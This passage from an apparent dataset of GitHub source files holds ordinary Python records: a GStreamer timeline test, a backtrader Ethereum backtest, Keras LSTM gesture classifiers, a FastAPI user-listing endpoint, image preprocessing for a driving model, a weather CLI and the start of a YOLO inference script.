self.assertEquals(len(all_clips), 4)\n        clip1.edit([], self.layer.get_priority(), GES.EditMode.EDIT_RIPPLE, GES.Edge.EDGE_NONE, 41.5 * Gst.SECOND)\n        self.assertEquals(len(self.layer.get_clips()), 4)\n        clip1.edit([], self.layer.get_priority(), GES.EditMode.EDIT_RIPPLE, GES.Edge.EDGE_NONE, 35 * Gst.SECOND)\n        self.assertEquals(len(self.layer.get_clips()), 4)\n\n\nclass TestSnapping(GESSimpleTimelineTest):\n\n    def test_snapping(self):\n        self.timeline.props.auto_transition = True\n        self.timeline.set_snapping_distance(1)\n        clip1 = self.add_clip(0, 0, 100)\n\n        # Split clip1.\n        split_position = 50\n        clip2 = clip1.split(split_position)\n        self.assertEquals(len(self.layer.get_clips()), 2)\n        self.assertEqual(clip1.props.duration, split_position)\n        self.assertEqual(clip2.props.start, split_position)\n\n        # Make sure snapping prevents clip2 from being moved to the left.\n        clip2.edit([], self.layer.get_priority(), GES.EditMode.EDIT_NORMAL, GES.Edge.EDGE_NONE,\n                   clip2.props.start - 1)\n        self.assertEqual(clip2.props.start, split_position)\n\n\nclass TestTransitions(GESSimpleTimelineTest):\n\n    def test_emission_order_for_transition_clip_added_signal(self):\n        self.timeline.props.auto_transition = True\n        unused_clip1 = self.add_clip(0, 0, 100)\n        clip2 = self.add_clip(100, 0, 100)\n\n        # Connect to signals to track in which order they are emitted.\n        signals = []\n\n        def clip_added_cb(layer, clip):\n            self.assertIsInstance(clip, GES.TransitionClip)\n            signals.append(\"clip-added\")\n        self.layer.connect(\"clip-added\", clip_added_cb)\n\n        def property_changed_cb(clip, pspec):\n            self.assertEqual(clip, clip2)\n            self.assertEqual(pspec.name, \"start\")\n            signals.append(\"notify::start\")\n        clip2.connect(\"notify::start\", property_changed_cb)\n\n        # Move clip2 to create a transition with clip1.\n        clip2.edit([], self.layer.get_priority(), GES.EditMode.EDIT_NORMAL, GES.Edge.EDGE_NONE, 50)\n        # The clip-added signal is emitted twice, once for the video\n        # transition and once for the audio transition.\n        self.assertEqual(signals, 
[\"notify::start\", \"clip-added\", \"clip-added\"])\n","repo_name":"namanyadav12/GStreamer","sub_path":"tests/check/python/test_timeline.py","file_name":"test_timeline.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27028430579","text":"from __future__ import (absolute_import, division, print_function, unicode_literals)\nimport backtrader as bt\nimport datetime\nimport os\nfrom time import time\nfrom color import Color\nimport talib as ta\nfrom base_strategy import BaseStrategies, print_time_elapsed\n\n\non_or_off = []\nrand_num = []\nhistogram_set = set()\nhistogram_list = list()\n\nema_short = 0\nema_long = 0\n\n\nclass EthereumStrategy(BaseStrategies):\n \n def __init__(self):\n super(EthereumStrategy, self).__init__()\n self.prev_ema_short = 0\n\n\n # region [blue]\n def macd_day_strategy(self):\n if not self.order:\n if not self.position:\n if self.macd_histogram[0] >= 0:\n self.order = self.buy()\n else:\n if self.macd_histogram[0] < 0:\n self.order = self.sell(exectype=bt.Order.StopTrail, trailamount=0.02)\n\n # end region\n\n \n # region [blue]\n def exponential_averages(self):\n if not self.order:\n if not self.position:\n if self.ema_short[0] > self.ema_long[0] + (self.ema_long[0] * 0.005):\n self.order = self.buy()\n self.buyprice = self.dataclose[0]\n else:\n if self.ema_short[0] < self.ema_long[0]:\n self.order = self.sell(exectype=bt.Order.StopTrail, trailamount=0.02) \n # end region\n\n\n\n # region [blue]\n def hybrid_strategy(self):\n\n # current_price = self.dataclose[0]\n global histogram_list\n \n histogram_list.append(self.macd_histogram[0])\n\n if not self.order:\n if not self.position:\n # if self.ema_very_short[0] > self.ema_short[0]:\n if self.ema_short[0] > self.ema_long[0] + self.ema_long[0] * 0.004 or self.rsi < 21:\n self.order = self.buy()\n self.buyprice = self.dataclose[0]\n else:\n if self.macd_histogram[0] < -3.6 or self.macd_histogram[0] > 5:\n global histogram_set\n histogram_set.add(self.macd_histogram[0])\n self.order = self.sell(exectype=bt.Order.StopTrail, trailamount=0.02)\n\n self.prev_ema_short = self.ema_short[0]\n # end region\n\n\n\n # TIMM ![(1 == F) and (2 == T)]\n def hybrid_strategy_optimizer(self):\n global on_or_off\n global rand_num\n global ema_short\n global ema_long\n\n macd_lower_threshold = rand_num[0]\n macd_upper_threshold = rand_num[1]\n \n ema_short = self.ema_short\n ema_long = self.ema_long\n\n\n if not self.order:\n if not self.position:\n if self.ema_short[0] > self.ema_long[0] + self.ema_long[0] * 0.04 or self.rsi < 21:\n self.order = self.buy()\n self.buyprice = self.dataclose[0]\n else:\n if not ((not (self.macd_histogram[0] < macd_lower_threshold) ) and (on_or_off[0])) and \\\n not ( not (self.macd_histogram[0] > macd_upper_threshold) ) and (on_or_off[1]):\n self.order = self.sell(exectype=bt.Order.StopTrail, trailamount=0.02)\n\n\n # region [red]\n def next(self):\n \n \"\"\"\n Possible strategies\n self.buy_and_hold()\n self.macd_strategy()\n self.rsi_strategy()\n self.ppsr()\n self.hybrid_strategy()\n self.exponential_averages()\n self.hybrid_strategy_optimizer()\n \"\"\"\n\n # self.buy_and_hold()\n # self.macd_strategy()\n # self.rsi_strategy()\n # self.ppsr()\n # self.exponential_averages()\n self.hybrid_strategy()\n # self.hybrid_strategy_optimizer()\n # end region\n\n\ndef print_header():\n os.system(\"cls\")\n print(\"\\n\\n\")\n print(\"#\"*60)\n print(\" \"*20 + \"START OF PROGRAM\")\n print(\"#\"*60)\n 
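# portability note: os.system(\"cls\") at the top of print_header() only clears\n    # the screen on Windows; the POSIX equivalent would be os.system(\"clear\")\n    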
print()\n\n\ndef run_backtesting():\n cerebro = bt.Cerebro()\n cerebro.addstrategy(EthereumStrategy)\n\n data = bt.feeds.YahooFinanceCSVData(\n dataname=\"data/ETH-USD.csv\",\n\n # Everything\n # fromdate=datetime.datetime(2015, 8, 7),\n # todate=datetime.datetime(2021, 3, 19),\n\n # normalized\n fromdate=datetime.datetime(2017, 8, 7),\n todate=datetime.datetime(2021, 3, 19),\n\n # slice 1\n # fromdate=datetime.datetime(2017, 5, 30),\n # todate=datetime.datetime(2018, 5, 30),\n\n # slice 2\n # fromdate=datetime.datetime(2018, 5, 30),\n # todate=datetime.datetime(2019, 5, 30),\n\n # slice 3\n # fromdate=datetime.datetime(2019, 5, 30),\n # todate=datetime.datetime(2020, 5, 30),\n\n # slice 4\n # fromdate=datetime.datetime(2020, 5, 30),\n # todate=datetime.datetime(2021, 5, 30),\n\n # small test slice\n # fromdate=datetime.datetime(2021, 1, 1),\n # todate=datetime.datetime(2021, 3, 27),\n \n reverse=False)\n\n starting_cash = 1\n binance_fixed_trade_fee = 0.00075\n\n cerebro.adddata(data)\n cerebro.broker.setcash(starting_cash)\n cerebro.addsizer(bt.sizers.AllInSizer)\n\n relative_trade_fee = cerebro.broker.getvalue() * binance_fixed_trade_fee\n cerebro.broker.setcommission(commission=relative_trade_fee, margin=True) \n cerebro.run()\n # histogram_list = sorted(histogram_set)\n\n\n\n cerebro.plot()\n return cerebro.broker.getvalue()\n\n\n\ndef run_hybrid_optimizer():\n global rand_num\n global on_or_off\n global ema_short\n global ema_long\n\n start_time = time()\n optimized_list = list()\n max = 0\n\n # LOWER_THRESHOLD (-3.6), HIGHER_THRESHOLD (5)\n # if self.macd_histogram[0] < -3.6 or self.macd_histogram[0] > 5:\n\n # lower_threshold: -10.0, -9.9, -9.8, ... , upper_threshold\n # (-10.0 + (.1 * i)) (i < upper)\n\n # upper_threshold: 10.0, 9.9, 9.8, ... , lower_threshold\n # 0.010, 0.011, 0.012, ... , 0.20 (190) (.01 + (.001 * i))\n \n # trail amount = 0.010, 0.011, 0.012, ... 
, 0.20 (190) (.01 + (.001 * i))\n\n\n for lower_thres in range(0, 200):\n \n print_time_elapsed(start_time, Color.OKBLUE)\n\n for upper_thres in range(lower_thres, 200):\n\n for i in range(2**2):\n \n rand_num = [ (-10.0 + (.1 * lower_thres)), round((-10 + (.1 * upper_thres)), 2) ]\n on_or_off = [int(i//2)%2, int(i//1)%2]\n number = run_backtesting()\n \n if number > max:\n print(\"Found: \", end='')\n print_time_elapsed(start_time)\n print(on_or_off, rand_num)\n print(str(number) + \"\\n\")\n print(\"ema_short: \", ema_short)\n print(\"ema_long: \", ema_long)\n optimized_list.append(str(on_or_off) + str(rand_num) + \"\\n\" + str(number) + \"\\n\" + \"ema_short: \" + str(ema_short) + \"\\n\" + \"ema_long: \" + str(ema_long) + \"\\n\")\n max = number\n\n print(\"FINAL----------\")\n print_time_elapsed(start_time, Color.Red)\n for i in optimized_list:\n print(i) \n\n\n\nif __name__ == '__main__':\n print_header()\n # run_hybrid_optimizer()\n run_backtesting()\n","repo_name":"RoryGlenn/BackTesting","sub_path":"etherium_strategy.py","file_name":"etherium_strategy.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6172669499","text":"def myEval(coeff, x):\n \"\"\"Evaluates the polynomial expressed as coeff at the value x.\"\"\"\n deg = len(coeff)\n sum = coeff[0]\n\n if deg != 1:\n for i in range(1, deg):\n sum = sum + coeff[i] * x**i\n \n return sum","repo_name":"TnMarshall/ECE02_2022_Project_Documentation","sub_path":"pythonPointKinematics/myEval.py","file_name":"myEval.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3985134691","text":"from fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\nfrom database.config import get_db\nfrom database.models import Friendship, Users\n\nfrom utils.auth import get_current_user\n\n\nrouter = APIRouter(prefix=\"/users\", tags=[\"Global Users\"])\n\n\n@router.get(\"/\")\nasync def get_all_users(\n user=Depends(get_current_user), database: Session = Depends(get_db)\n):\n db_users = database.query(Users).all()\n\n response = []\n\n for db_user in db_users:\n friendship = (\n database.query(Friendship)\n .filter(Friendship.user_id == user.id, Friendship.friend_id == db_user.id)\n .first()\n )\n\n response.append(\n {\n \"user_id\": db_user.id,\n \"first_name\": db_user.first_name,\n \"last_name\": db_user.last_name,\n \"username\": db_user.username,\n \"picture\": db_user.picture,\n \"friendship\": False if friendship is None else True,\n }\n )\n\n return response\n","repo_name":"tovarc/social-app-backend","sub_path":"routers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18229058597","text":"import os, glob, sys, _pickle, time, math, gc\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom keras.models import Model, load_model\nfrom keras import optimizers, Sequential\nfrom keras.utils import plot_model\nfrom keras import layers #Dense, LSTM, RepeatVector, TimeDistributed, Dropout, Masking, BatchNormalization, Flatten, Input, Conv2D, MaxPooling1D, Conv1D, Reshape, GRU\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping, CSVLogger\nfrom sklearn.metrics import confusion_matrix\nfrom matplotlib import pyplot as plt\nfrom keras import backend as K\nfrom datetime 
import datetime\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nclass interpretModel:\n \"\"\"\n Note: Currently switched suffle to False for both train_generator and train_test_split\n\n \"\"\"\n\n def __init__(self, path, task):\n self.dataPath = path\n self.task = task\n now = datetime.now()\n month_ = datetime.now().month\n day_ = now.day\n hour_ = now.hour\n minute_ = now.minute\n\n def setData(self, data):\n \"\"\"\n Allows another class to set data\n \"\"\"\n self.data = data\n self.train_data = [data[:,0], data[:,1]]\n self.test_data = [data[:,2], data[:,3]]\n #print (\"train Data {} test Data {}\".format(self.train_data[0].shape, self.test_data[0].shape))\n\n\n def buildModelv1(self, timesteps, n_features):\n \"\"\"\n Simple model which yields a high accuracy of 90% on training data but sucks on the validation data\n \"\"\"\n model_input = layers.Input(shape=(timesteps, n_features))\n lstm_output = layers.LSTM(256, input_shape=(timesteps, n_features), return_sequences=True)(model_input)\n dropout_output = layers.Dropout(rate=0.5)(lstm_output)\n flatten_output = layers.Flatten()(dropout_output)\n dense_output1 = layers.Dense(128, activation='relu')(flatten_output)\n dropout_output2 = layers.Dropout(rate=0.5)(dense_output1)\n dense_output2 = layers.Dense(15, activation='softmax')(dropout_output2)\n lstm_classifier = Model(model_input, dense_output2)\n #lstm_classifier.summary()\n\n return lstm_classifier\n\n def buildModelv2(self, timesteps, n_features):\n \"\"\"\n An lstm-encoder model followed by dense layers, similar performance to just lstm\n \"\"\"\n lstm_hidden1 = 128#*4\n lstm_hidden2 = 64\n dense_hidden1 = 64\n output_layer = 15\n\n model_input = layers.Input(shape=(timesteps, n_features))\n lstm_output = layers.LSTM(lstm_hidden1, input_shape=(timesteps, n_features), return_sequences=True)(model_input) #previously 96\n dropout_output = layers.Dropout(rate=0.4, noise_shape=(None, None, lstm_hidden1))(lstm_output) #previously 0.4\n batch_norm1 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dropout_output)\n lstm_output2 = layers.LSTM(lstm_hidden2, input_shape=(timesteps, n_features), return_sequences=False)(batch_norm1)\n dropout_output = layers.Dropout(rate = 0.5, noise_shape=(None, lstm_hidden2))(lstm_output2)\n batch_norm2 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dropout_output)\n repeat_vector = layers.RepeatVector(timesteps)(batch_norm2)\n\n flatten_output = layers.Flatten()(repeat_vector)\n batch_norm2 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(flatten_output)\n dropout_output = layers.Dropout(rate = 0.5)(batch_norm2)\n dense_output1 = layers.Dense(dense_hidden1, activation='relu')(dropout_output)\n batch_norm3 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dense_output1)\n dense_output2 = layers.Dense(output_layer, activation='softmax')(batch_norm3)\n lstm_classifier = Model(model_input, dense_output2)\n lstm_classifier.summary()\n\n return lstm_classifier\n\n def buildModelv3(self, timesteps, n_features):\n \"\"\"\n An lstm-encoder model followed by dense layers, similar performance to just lstm\n \"\"\"\n print (\"Using a conv-net approach\")\n model_input = layers.Input(shape=(timesteps, n_features))\n lstm_output = layers.Conv1D(filters= 128, kernel_size=3, data_format='channels_first')(model_input) #previously 96\n dropout_output = layers.MaxPooling1D(pool_size=2)(lstm_output)\n 
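# caution: data_format='channels_first' in the Conv1D above makes Keras treat\n        # the timesteps axis as channels and convolve along n_features; the default\n        # 'channels_last' would slide the kernel over time instead\n        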
flatten_output = layers.Flatten()(dropout_output)\n        dense_output1 = layers.Dense(64, activation='relu')(flatten_output)\n        batch_norm3 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dense_output1)\n        dense_output2 = layers.Dense(15, activation='softmax')(batch_norm3)\n        lstm_classifier = Model(model_input, dense_output2)\n        lstm_classifier.summary()\n\n        return lstm_classifier\n\n    def buildModelv4(self, timesteps, n_features):\n        \"\"\"\n        An LSTM encoder-decoder model followed by dense layers\n        \"\"\"\n        print (\"Using a lstm encoder-decoder approach\")\n\n        lstm_hidden1 = 128#512\n        lstm_hidden2 = 32\n        dense_hidden1 = 48\n        output_layer = 15\n\n        model_input = layers.Input(shape=(timesteps, n_features))\n        lstm_output = layers.LSTM(lstm_hidden1, input_shape=(timesteps, n_features), return_sequences=True)(model_input) #previously 96\n        dropout_output = layers.Dropout(rate=0.4, noise_shape=(None, None, lstm_hidden1))(lstm_output) #previously 0.4\n        batch_norm1 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dropout_output)\n\n        flatten_output = layers.Flatten()(batch_norm1)\n        batch_norm2 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(flatten_output)\n        dropout_output = layers.Dropout(rate = 0.5)(batch_norm2)\n        dense_output1 = layers.Dense(dense_hidden1, activation='relu')(dropout_output)\n        batch_norm3 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dense_output1)\n        dense_output2 = layers.Dense(output_layer, activation='softmax')(batch_norm3)\n        lstm_classifier = Model(model_input, dense_output2)\n        lstm_classifier.summary()\n\n        return lstm_classifier\n\n    def buildModelv5(self, timesteps, n_features):\n        lstm_hidden1 = 1024\n        dense_hidden1 = 64*2\n        output_layer = 15\n\n        model_input = layers.Input(shape=(timesteps, n_features))\n        lstm_output = layers.LSTM(lstm_hidden1, input_shape=(timesteps, n_features), return_sequences=True)(model_input) #previously 96\n        dropout_output = layers.Dropout(rate=0.3, noise_shape=(None, None, lstm_hidden1))(lstm_output) #previously 0.4\n\n        flatten_output = layers.Flatten()(dropout_output)\n        dense_output2 = layers.Dense(output_layer, activation='softmax')(flatten_output)\n        lstm_classifier = Model(model_input, dense_output2)\n\n        return lstm_classifier\n\n    def trainModel(self, lstm_classifier, mode, user_out, setup, learning_rate, type, currentTimestamp, kinvars):\n        \"\"\"\n        Train the LSTM model with fit, one call per stored train/test split\n        \"\"\"\n\n        train = 1\n        epochs = 1#30\n        num_epochs = 30#len(self.data)\n        #print (\"timesteps {} n_features {}\".format(self.dataPath, self.task))\n        batch_size = 32\n\n        csv_path = os.path.join(self.dataPath, self.task, \"GestureClassification\", kinvars, currentTimestamp, \"csvs\")\n        checkpoint_path = os.path.join(self.dataPath, self.task, \"GestureClassification\", kinvars, currentTimestamp, \"checkpoints\")\n        self.makePaths(csv_path, checkpoint_path)\n\n        plot_model(lstm_classifier, to_file='{}/model.png'.format(checkpoint_path),show_shapes=True)\n\n        if train==1:\n            for i in range(num_epochs):\n                #train and test data\n                x_train, y_train, x_test, y_test = self.data[i] #i\n                # callbacks\n                cp3 = CSVLogger(filename=\"{}/{}{}{}{}.csv\".format(csv_path, setup, mode, user_out, type), append=False if i==0 else True, separator=';')\n                cp2 = ModelCheckpoint(filepath=\"{}/exp_segment_classifier_{}{}{}{}.h5\".format(checkpoint_path, setup, mode, user_out, type))\n                cp1 = EarlyStopping(monitor='val_acc', min_delta=0.0000, 
patience=3, verbose=0)\n                adam = optimizers.Adam(self.step_decay(i, learning_rate))\n                lstm_classifier.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy'])\n\n                #tensorboard = TensorBoard(log_dir=\"logs/{}\".format(mode))\n                #fitting model\n                lstm_classifier.fit(x_train, y_train, batch_size=batch_size, callbacks =[cp1, cp2, cp3], validation_data=(x_test, y_test))\n\n                \"\"\"\n                cf_matrix = confusion_matrix(y_test.argmax(axis=1), model_output.argmax(axis=1))\n                #print (cf_matrix)\n                cmap=plt.cm.Blues\n                fig, ax = plt.subplots()\n                im = ax.imshow(cf_matrix, interpolation='nearest', cmap=cmap)\n                ax.figure.colorbar(im, ax=ax)\n                # We want to show all ticks...\n                ax.set(xticks=np.arange(cf_matrix.shape[1]), yticks=np.arange(cf_matrix.shape[0]))\n                #plt.show()\n                \"\"\"\n                tf.reset_default_graph()\n                gc.collect()\n                K.clear_session()\n\n    def step_decay(self, epoch, lr):\n        \"\"\"\n        Step-decay schedule: halve the learning rate every few epochs\n        \"\"\"\n        initial_lrate = lr\n        drop = 0.5\n        epochs_drop = 5.0\n        if epoch>10:\n            drop=0.5\n            epochs_drop = 3\n\n        lrate = initial_lrate * math.pow(drop, math.floor((1+epoch)/epochs_drop))\n        print (\"learning rate {}\".format(lrate))\n        return lrate\n\n    def makePaths(self, csv_path, checkpoint_path):\n        \"\"\"\n        This function makes paths for saving model progress, figures and checkpoints\n        \"\"\"\n        if not os.path.exists(csv_path):\n            os.makedirs(csv_path)\n\n        if not os.path.exists(checkpoint_path):\n            os.makedirs(checkpoint_path)\n","repo_name":"UVA-DSA/ContextMonitor","sub_path":"dsn2020/lstm_experimentalsetup.py","file_name":"lstm_experimentalsetup.py","file_ext":"py","file_size_in_byte":10185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"9468438758","text":"from random import shuffle\n\nimport cv2\nimport numpy as np\n\nfrom collect_data import VERTICES\n\nWIDTH = 50\nHEIGHT = 50\nSTART_SAVE_DATA = 2\nDATA_RANGE = 1050\nPROCESS_BATCH_SIZE = 10\n\n# TRAINING_DATA_NPY_PATH = 'D:\Driver/Training Data/Driver/400_400 Approx Images/training_data-{}.npy'\nTRAINING_DATA_NPY_PATH = \\\n    'D:\MegaSync/Languages/Python/CT83-PC/Driver-Server/computer/training_data/training_data-{}.npy'\n# PROCESSED_DATA_NPY_PATH = 'D:\Driver/Training Data/Driver/50_50 Long/balanced/training_data-{}.npy'\nPROCESSED_DATA_NPY_PATH = \\\n    'D:\MegaSync/Languages/Python/CT83-PC/Driver-Server/computer/training_data/processed/training_data-{}.npy'\n\n\ndef balance_data(train_data):\n    lefts = []\n    rights = []\n    forwards = []\n\n    for data in train_data:\n        img = data[0]\n        choice = data[1]\n\n        if choice == [1, 0, 0]:\n            lefts.append([img, choice])\n        elif choice == [0, 1, 0]:\n            forwards.append([img, choice])\n        elif choice == [0, 0, 1]:\n            rights.append([img, choice])\n        else:\n            print('no matches')\n            # input(\"Press Enter to continue...\")\n\n    print(\"Lefts:\", len(lefts), \" Forwards:\", len(forwards), \" Rights:\", len(rights))\n    forwards = forwards[:len(lefts)][:len(rights)]\n    lefts = lefts[:len(forwards)]\n    rights = rights[:len(forwards)]\n\n    final_data = forwards + lefts + rights\n    shuffle(final_data)\n    return final_data\n\n\ndef combine_all_data(start_data_range=1, data_range=DATA_RANGE):\n    train_data = []\n    for j in range(start_data_range, data_range):\n        try:\n            print(\"Loading training_data-{}.npy\".format(j))\n            inf_from_every_file = np.load(TRAINING_DATA_NPY_PATH.format(j))\n            train_data.append(inf_from_every_file)\n        except Exception as e:\n            print(e)\n            print('Failed to load training_data-{}.npy'.format(j))\n    train_data = np.concatenate(train_data)\n    return 
train_data\n\n\ndef data_transform():\n name_ctr = START_SAVE_DATA\n for j in range(1, DATA_RANGE, PROCESS_BATCH_SIZE):\n training_data = []\n try:\n data = combine_all_data(start_data_range=j, data_range=j + PROCESS_BATCH_SIZE)\n\n print(\"Data Shape:\", len(data))\n for frame_input in data:\n image = frame_input[0]\n keys = frame_input[1]\n image = process_img(image, width=WIDTH, height=HEIGHT)\n\n preview_image(image)\n print(keys)\n\n training_data.append([image, keys])\n training_data = balance_data(training_data)\n shuffle(training_data)\n print(\"Saving \", PROCESSED_DATA_NPY_PATH.format(name_ctr))\n # np.save(PROCESSED_DATA_NPY_PATH.format(name_ctr), training_data)\n name_ctr += 1\n except Exception as e:\n print(e)\n\n\ndef preview_image(image, name=\"window\"):\n cv2.imshow(name, cv2.resize(image, (400, 400)))\n if cv2.waitKey(3) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n\n\ndef process_camera_image(original_img):\n process_image = original_img\n process_image = cv2.flip(process_image, 0) # Vertical Flip\n # process_image = imutils.rotate(process_image, 90)\n process_image = cv2.cvtColor(process_image, cv2.COLOR_BGR2RGB)\n return process_image\n\n\ndef process_img(original_img, width=640, height=640):\n processed_img = process_camera_image(original_img)\n # processed_img = cv2.Canny(processed_img, threshold1=25, threshold2=20)\n processed_img = cv2.cvtColor(processed_img, cv2.COLOR_RGB2GRAY)\n\n # processed_img = cv2.resize(processed_img, (width, height))\n processed_img = region_of_interest(processed_img, [VERTICES])\n\n return processed_img\n\n\ndef region_of_interest(img, vertices):\n # defining a blank mask to start with\n mask = np.zeros_like(img)\n\n # defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 
3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n\n # filling pixels inside the polygon defined by \"vertices\" with the fill color\n cv2.fillPoly(mask, vertices, ignore_mask_color)\n\n # returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n\nif __name__ == '__main__':\n data_transform()\n","repo_name":"CT83/Driver","sub_path":"training_data_mods/data_transform.py","file_name":"data_transform.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"10809640388","text":"\nclass Node:\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\n\ndef printList(head):\n ptr = head\n while ptr is not None:\n print(ptr.data, end=\"->\")\n ptr = ptr.next\n print(\"None\")\n\ndef construct():\n return Node(1, Node(2, Node(3, Node(4))))\n\n\nif __name__ == '__main__':\n head = construct()\n printList(head)\n","repo_name":"siddeshbg/my-ds-algorithms","sub_path":"003-linked-lists/03_singly_linked_list_naive_2.py","file_name":"03_singly_linked_list_naive_2.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9739902706","text":"\"\"\"Demonstrates the use of the package.\n\nGets the current weather.\n\nUsage\n-----\n> get_weather.py\nFetching locations...\nINFO:root:Searching data for time window 2022-02-09T09:47:59...2022-02-10T09:47:59.\nINFO:root:Found 1320 entries.\nINFO:root:Latest entry at 2022-02-10 07:50:00.\nLocations:\n Alajärvi Möksy\n Espoo Tapiola\n Haapavesi Mustikkamäki\n...\n Virrat Äijänneva\n Ylivieska lentokenttä\n Ähtäri Inha\n\n> get_weather.py 'Tornio Torppi'\nFetching weather data for location 'Tornio Torppi'...\nINFO:root:Searching data for time window 2022-02-09T09:46:06...2022-02-10T09:46:06.\nINFO:root:Found 76 entries.\nFound weather data for location 'Tornio Torppi'.\nFound data keys:\n times\n WS_10MIN\n WD_10MIN\n WG_10MIN\n T\n RH\n TD\n P_SEA\n R_1H\n VIS\n N_MAN\n WAWA\nAnalyzing data...\nPlotting data...\n\"\"\"\nimport sys\nimport logging\nimport argparse\n\ntry:\n import matplotlib.pyplot as plt\n import pandas as pd\nexcept ImportError as e:\n print(\"ERROR: Extras need to installed in order to run this file.\")\n print(e)\n sys.exit(-1)\n\nfrom epps.weather import get_weather_data, get_locations\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"location\", type=str, nargs='?', default='')\n args = parser.parse_args()\n\n if args.location == '':\n print(\"Fetching locations...\")\n locations = get_locations()\n if locations is None:\n print(\"Could not find any locations.\")\n sys.exit(-1)\n\n print(\"Locations:\")\n for location in locations:\n print(f\"\\t{location}\")\n sys.exit(0)\n\n print(f\"Fetching weather data for location '{args.location}'...\")\n locations, weather_data = get_weather_data(args.location)\n\n if weather_data is None:\n print(f\"Could not fetch weather data for location '{args.location}'.\")\n print(\"Locations:\")\n for location in locations:\n print(f\"\\t{location}\")\n sys.exit(-1)\n\n print(f\"Found weather data for location '{args.location}'.\")\n print(\"Found data keys:\")\n for key in weather_data.keys():\n print(f\"\\t{key}\")\n\n print(\"Analyzing data...\")\n t = weather_data['times']\n d 
= {key: value['values'] for key, value in weather_data.items() if key != 'times'}\n units = {key: value['unit'] for key, value in weather_data.items() if key != 'times'}\n titles = list(d.keys())\n ylabels = list(units.values())\n\n df = pd.DataFrame.from_dict(d)\n df.index = pd.DatetimeIndex(t)\n\n print(\"Plotting data...\")\n n_cols = 2\n n_rows = int(len(df.columns)/n_cols) + (len(df.columns) % n_cols)\n axs = df.plot(\n subplots=True,\n sharex=True,\n figsize=(4*n_cols, 2*n_rows),\n layout=(n_rows, n_cols),\n title=args.location,\n legend=False,\n color='black',\n )\n\n for row in range(n_rows):\n for col in range(n_cols):\n i = row*n_cols + col\n if i < len(ylabels):\n axs[row, col].set_title(titles[i])\n axs[row, col].set_ylabel(ylabels[i])\n\n \n plt.tight_layout()\n plt.show()\n","repo_name":"juusokorhonen/python-club","sub_path":"session_3/bin/get_weather.py","file_name":"get_weather.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42426915934","text":"import time\nfrom pathlib import Path\n\nimport cv2\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom numpy import random\n\nfrom models.experimental import attempt_load\nfrom utils.datasets import LoadStreams, LoadImages\nfrom utils.general import check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, \\\n strip_optimizer, set_logging, increment_path\n#from utils.plots import plot_one_box\nfrom utils.torch_utils import select_device, load_classifier, time_synchronized\n\nsource = 'data/images/'\nweights = 'weights/best_results.pt'\nimgsz = 416\nconf_thres = 0.25\niou_thres = 0.45\nclasses = ''\nagnostic_nms = ''\n\ndef predict(weights=weights, imgsz=imgsz, source=source):\n\n conf = 0\n\n set_logging()\n device='cpu'\n device = select_device(device)\n half = device.type != 'cpu' \n\n model = attempt_load(weights, map_location=device) # load FP32 model\n imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size\n if half:\n model.half() # to FP16\n\n # Set Dataloader\n vid_path, vid_writer = None, None\n dataset = LoadImages(source, img_size=imgsz)\n\n # Get names and colors\n names = model.module.names if hasattr(model, 'module') else model.names\n colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]\n\n # Run inference\n t0 = time.time()\n img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img\n _ = model(img.half() if half else img) if device.type != 'cpu' else None # run once\n for path, img, im0s, vid_cap in dataset:\n img = torch.from_numpy(img).to(device)\n img = img.half() if half else img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n\n # Inference\n t1 = time_synchronized()\n pred = model(img)[0]\n\n # Apply NMS\n pred = non_max_suppression(pred, conf_thres, iou_thres, classes, agnostic_nms)\n t2 = time_synchronized()\n\n # Process 